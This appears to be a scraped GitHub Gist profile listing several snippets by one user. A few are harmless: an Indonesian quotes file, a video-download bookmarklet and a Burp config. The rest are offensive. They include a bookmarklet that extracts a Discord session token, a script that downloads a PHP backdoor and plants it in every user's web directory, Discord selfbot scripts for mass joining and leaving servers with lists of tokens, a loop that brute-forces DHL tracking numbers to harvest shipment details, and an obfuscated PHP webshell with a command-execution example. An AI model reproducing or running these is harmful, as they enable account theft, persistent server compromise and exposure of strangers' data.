Skip to content

Instantly share code, notes, and snippets.

View vsec7's full-sized avatar

Viloid vsec7

View GitHub Profile
@vsec7
vsec7 / quote-id.json
Created February 8, 2023 13:05
Source from : github.com/lakuapik/quotes-indonesia/
[{"by": "A. France", "quote": "Lebih baik mengerti sedikit daripada salah mengerti."}, {"by": "Abraham Lincoln", "quote": "Hampir semua pria memang mampu bertahan menghadapi kesulitan. Namun, jika Anda ingin menguji karakter sejati pria, beri dia kekuasaan."}, {"by": "Aeschylus", "quote": "Bila tekad seseorang kuat dan teguh, Tuhan akan bergabung dalam usahanya."}, {"by": "Aesop", "quote": "Penderitaan adalah pelajaran."}, {"by": "Albert Einstein", "quote": "Ilmu pengetahuan tanpa agama adalah pincang."}, {"by": "Albert Einstein", "quote": "Hidup itu seperti sebuah sepeda, agar tetap seimbang kita harus tetap bergerak."}, {"by": "Albert Einstein", "quote": "Perbedaan masa lalu, sekarang, dan masa depan tak lebih dari ilusi yang keras kepala."}, {"by": "Albert Einstein", "quote": "Sebuah meja, sebuah kursi, semangkuk buah, dan sebuah biola; apa lagi yang dibutuhkan agar seseorang bisa merasa bahagia?."}, {"by": "Albert Enstein", "quote": "Belas kasihanlah terhadap sesama, bersikap keraslah terhadap diri sendir

Discord Bookmarklet

Created By viloid (github.com/vsec7)

*** NOTE : USE AT YOUR OWN RISK! ***

Get Selfbot Discord Token

GET TOKEN

javascript:(()=>{var t=document.body.appendChild(document.createElement`iframe`).contentWindow.localStorage.token.replace(/["]+/g, '');prompt('Get Selfbot Discord Token by github.com/vsec7', t)})();
@vsec7
vsec7 / mass_shell.sh
Created April 13, 2022 16:41
Copy file to all user directory . *note: do with root / sudoer
#!/usr/bin/env bash
f="file1.php"
wget -O "$f" https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php
_USERS="$(awk -F':' '{ if ( $3 >= 500 ) print $1 }' /etc/passwd)"
for u in $_USERS; do
_dir="/home/${u}/public_html"
if [ -d "$_dir" ]; then
cp -f "${f}" "$_dir"
chown $(id -un $u):$(id -gn $u) "${_dir}/${f}"
@vsec7
vsec7 / leave.sh
Last active April 13, 2022 22:30
Mass leave discord server
#!/usr/bin/env bash
# DC mass leave server
# Created by github.com/vsec7
# Usage : ./script listtoken
leave(){
g=$(curl -s -X DELETE "https://discordapp.com/api/v6/users/@me/guilds/$1" \
-H "Authorization: $2")
if [ -z $g ]; then
echo "[+] $2 : Success leave"
@vsec7
vsec7 / invite.sh
Last active April 13, 2022 22:30
Mass join discord server
#!/usr/bin/env bash
# DC mass join server
# Created by github.com/vsec7
# Usage : ./script
join(){
g=$(curl -s -X POST "https://discordapp.com/api/v6/invites/$1" \
-H "Authorization: $2")
if [ $(echo $g | grep -oP '"new_member": \K[^,]+' ) == "true" ]; then
echo "[+] $2 : Succesfully joined"
@vsec7
vsec7 / gen_dhl_awb.sh
Created April 7, 2021 04:39
Generate random awb DHL (delivered only)
echo;while :;do d=10;a=$(date +%s);b=$((a*RANDOM));while [ ${#b} -lt 10 ]; do b="${b}$RANDOM";done;g=$(curl -s "https://mydhl.express.dhl/shipmentTracking?AWB=$(echo "${b:0:d}")&countryCode=id&languageCode=en" | jq .results[0]); if [ $(echo $g | jq -r .delivery.status) == "delivered" ]; then printf "%s | %s| ori: %s | dest: %s\n" "$(echo $g | jq -r .id)" "$(echo $g | jq -r .checkpoints[0].date)" "$(echo $g | jq -r .origin.value)" "$(echo $g | jq -r .destination.value)" | tee -a dhlawb.txt;fi;done
@vsec7
vsec7 / Bookmarklet_FB_downloader_via_chrome_android.md
Created October 18, 2020 14:10
Download video Facebook via Chrome Android

Download video Facebook via Chrome Android

    1. visit link facebook video
    1. copy paste this payload on url bar
javascript:window.open(document.body.innerHTML.match(/(?<=video:\[\{url:").*?(?=")/),'_blank');

*NB :

@vsec7
vsec7 / WAHH_Task_Checklist.md
Created September 5, 2020 03:06 — forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
@vsec7
vsec7 / Non-Alphanumeric_WebShell.md
Created July 27, 2020 11:54
Non-Alphanumeric WebShell PHP explaination

Non-Alphanumeric WebShell PHP

Code :

<?php $_='{';$_=($_^'<').($_^'>;').($_^'/');${'_'.$_}['_'](${'_'.$_}['__']);

Cara Akses :

shell.php?_=system&__=id
@vsec7
vsec7 / BurpSuiteSSLPassTrough.json
Created June 25, 2020 11:43
Filter out the noise
{
"proxy":{
"ssl_pass_through":{
"automatically_add_entries_on_client_ssl_negotiation_failure":false,
"rules":[
{
"enabled":true,
"host":".*\\.google\\.com",
"protocol":"any"
},